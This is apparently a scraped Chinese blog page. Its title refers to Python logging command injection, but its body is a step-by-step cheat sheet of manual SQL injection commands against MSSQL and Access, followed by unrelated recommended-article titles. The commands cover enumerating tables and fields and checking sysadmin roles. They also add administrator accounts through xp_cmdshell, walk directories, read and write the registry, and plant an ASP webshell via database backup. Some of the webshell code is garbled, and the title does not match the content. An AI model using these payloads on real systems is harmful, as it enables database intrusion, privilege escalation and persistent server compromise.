python logging命令注入_整理后的手动注入脚本命令
1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str p_w_picpath);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str p_w_picpath);
insert into cmd(str) values ('
"&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
python logging命令注入_整理后的手动注入脚本命令相关推荐
- php mate,textmate 命令行_使用PHP在TextMate中创建命令
textmate 命令行_使用PHP在TextMate中创建命令 textmate 命令行_使用PHP在TextMate中创建命令 textmate 命令行 TextMate is the best ...
- 05_SQL注入_功能语句报错注入盲注
05_SQL注入_功能语句&报错回显&盲注 1. SQL 语句和网站功能 1.1 Web开发中常见语句 [本章代码来源于pikachu和sqli-lab中的靶场] 开发中,根据不同的需 ...
- factorybean 代理类不能按照类型注入_彻底搞懂依赖注入(一)Bean实例创建过程
点击上方"Java知音",选择"置顶公众号" 技术文章第一时间送达! 上一章介绍了Bean的加载过程(IOC初始化过程),加载完成后,紧接着就要用到它的依赖注入 ...
- java远程线程注入_系统权限远程线程注入到Explorer.exe
提升为系统权限,注入到explorer中 一丶简介 我们上一面说了系统服务拥有系统权限.并且拥有system权限.还尝试启动了一个进程. 那么我们是不是可以做点坏事了. 我们有一个系统权限进程.而调用 ...
- sql 整改措施 注入_记一次Sql注入 解决方案
老大反馈代码里面存在sql注入,这个漏洞会导致系统遭受攻击,定位到对应的代码,如下图所示 image like 进行了一个字符串拼接,正常的情况下,前端传一个 cxk 过来,那么执行的sql就是 se ...
- python 公众号爬虫_整理公众号文章?Python爬虫让一切变的简单……
有时候公众号文章需要进行整理分析,要把所有文章的链接整合起来还真不是一个容易的事情!手动整理固然简单,但文章数量多起来整理还真不是一件容易的事情. 这个时候我们可以用到神器Python,定制爬虫的指定 ...
- python numpy库作用_整理numpy库的常用功能(持续更新…),NumPy,函数,梳理
NumPy简介 NumPy是Python中科学计算的基础包.它是一个Python库,提供多维数组对象,各种派生对象(如掩码数组和矩阵),以及用于数组快速操作的各种API,有包括数学.逻辑.形状操作.排 ...
- linux 文件大小_整理 | Linux下列出目录内容命令
IT服务圈儿 有温度.有态度的IT自媒体平台 来源:良许Linux(ID:liangxuxiansheng) 在 Linux 中,有非常多的命令可以让我们用来执行各种各样的任务.当我们想要像使用文件浏 ...
- python logging打印终端_想知道Python如何在终端上打印表格吗?两行代码告诉你!
前言 Python具有非常多的库,其中就有非常好玩的库Pylsy,用于在终端上打印表格,只需要短短的两行代码,每个人都可以看懂. 简单使用方法: 首先import 导入模块 from 然后创建一个包含 ...
最新文章
- linux 下mysql的管理,Linux下 MySQL安装和基本管理
- C++实现二分查找(递归方法和非递归方法)
- python就业前景分析-最新的Python就业前景分析一览表
- 我的.gitignore下配置。存在这里一下。日后有空研究研究!
- 将serversocket 写在按钮事件中连接不上_看 Netty 在 Dubbo 中如何应用
- qt动画效果_Qt编写自定义控件44-天气仪表盘
- 窗口缩小 怎么让定位的盒子不动_一次解决你的图像尺寸和定位问题
- 开源中国android代码是什么,开源中国 OsChina Android 客户端源码分析(1)启动界面 app_start...
- [Project Euler] 来做欧拉项目练习题吧: 题目012
- Android service进程保护
- html中怎么让盒子模型居中,通过box盒子模型给元素内容设置居中
- 学思录(一):带着信息的角度去学习
- cropper截图插件(自定义像素的图片并保存本地)
- 域环境SID相同到底有什么影响?
- 前端代码拆分的意义,以及如何拆分代码,文件拆分--前端教学文-f
- Vue手写一个日历组件
- golang之crc32算法解密字符串
- PhotoShop 颜色替换工具、仿制图章工具
- u版yolov3详解 --- loss 部分
- 易车与蛋蛋订车俩大汽车平台对比分析
热门文章
- pdb+ipdb 调试 Python代码
- R包stringr处理字符串
- python生成随机数—random模块
- opensuse 安装 php,在openSUSE上安装和配置LAMP(2)
- html javascript 字符串和数组互转 字符串拼接 数组拼接
- windows10下使用wget命令(安装失败,请大家提意见)
- Unity创建登录页面(2)
- 模型加速--Slimmable neural networks
- ASP .NET Core Web MVC系列教程四:添加模型
- java多线程常用面试_java的多线程常见面试题